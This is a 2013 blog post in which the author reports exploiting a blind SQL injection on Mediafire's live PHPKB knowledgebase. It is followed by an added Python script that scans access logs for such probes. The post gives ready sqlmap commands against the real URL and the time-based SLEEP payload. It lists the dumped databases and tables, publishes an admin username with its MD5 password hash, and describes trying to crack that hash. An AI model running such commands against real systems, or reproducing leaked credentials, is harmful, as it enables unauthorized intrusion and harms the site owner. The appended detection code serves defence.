Tuesday, June 4, 2013

Mediafire Blind SQL Injection



I found a critical blind SQLi bug in the Mediafire knowledgebase, which could be used to break into Mediafire servers. Please look below for details.


#Software Type: PHPKB Knowledge Base Software v7

#Tool Used: sqlmap on Ubuntu

#Tested on: Ubuntu & Windows (Chrome & Firefox)

#Commands used in sqlmap:


1>>   ./sqlmap.py -u "http://knowledgebase.mediafire.com/article.php?id=72" --dbs

2>>   ./sqlmap.py -u "http://knowledgebase.mediafire.com/article.php?id=72" -D knowledgebase --tables





Type: PHPKB Knowledge Base Software

---------------------
Blind SQL Injection
---------------------

http://knowledgebase.mediafire.com/article.php?id=72

Target:
http://knowledgebase.mediafire.com/article.php?id=%Inject_Here%72

---

Place: GET
Parameter: id

Type: AND/OR time-based blind
Title: Mysql > 5.0.11 AND time-based blind
Payload: id=72 AND SLEEP(5)

---

available databases [3]:

[*] information_schema
[*] knowledgebase
[*] test

Database: knowledgebase
[27 tables]
+-------------------------------+
| phpkb_article_collaboration   |
| phpkb_article_versions        |
| phpkb_article_visits          |
| phpkb_articles                |
| phpkb_attachments             |
| phpkb_authors                 |
| phpkb_autosave                |
| phpkb_categories              |
| phpkb_comments                |
| phpkb_custom_data             |
| phpkb_custom_fields           |
| phpkb_favorites               |
| phpkb_glossary                |
| phpkb_groups                  |
| phpkb_groups_categories       |
| phpkb_groups_relations        |
| phpkb_languages               |
| phpkb_login_attempts          |
| phpkb_news                    |
| phpkb_ratings                 |
| phpkb_referrers               |
| phpkb_relations               |
| phpkb_saved_searches          |
| phpkb_subscribers             |
| phpkb_templates               |
| phpkb_tickets                 |
| phpkb_translation_assignments |
+-------------------------------+

While digging through their tables, I found the admin details in the table _authors. It was getting a bit harder, as sqlmap was not able to extract the column names completely. So I made a guess, and it was author_username & author_password. So I found the below details:

admin:3793afe7fdea09c7f8055834cc252234

While testing the algorithm of the hash, I found that it was MD5 or domain cached credentials.
But I couldn't crack it; it was taking a hell of a lot of time.

So this was all. When I reported it to Mediafire's VP, they said it's a duplicate. And hence I made it public.





-Cyb3R_Shubh4M
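
Added example (not part of the original post): a log check a defender could run to spot requests like the `id=72 AND SLEEP(5)` payload reported above, where the `id` parameter of article.php carries anything other than an integer. The access-log lines are constructed, and the names `scan` and `classify_id` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses and times are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Jun/2013:10:00:01 +0000] "GET /article.php?id=72 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2013:10:00:05 +0000] "GET /article.php?id=72%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2013:10:00:12 +0000] "GET /article.php?id=72+and+sleep%285%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.8 - - [04/Jun/2013:10:00:20 +0000] "GET /index.php?q=sleep+tips HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.10 - - [04/Jun/2013:10:00:31 +0000] "GET /article.php?id=72abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL functions that introduce a delay, as in the time-based blind payload above.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)

def classify_id(value):
    """Return None for a well-formed article id, otherwise a reason string."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if DELAY_RE.search(value):
        return "time-delay function in id"
    return "non-integer id"

def scan(log_text, path="/article.php", param="id"):
    """Return (client, decoded value, reason) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs decodes %20 and '+', so encoded payloads are normalised before matching.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(value)
            if reason:
                findings.append((client, value, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection only shows that someone probed the parameter; the fix belongs in the application, which should bind `id` as an integer parameter instead of concatenating it into the query.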
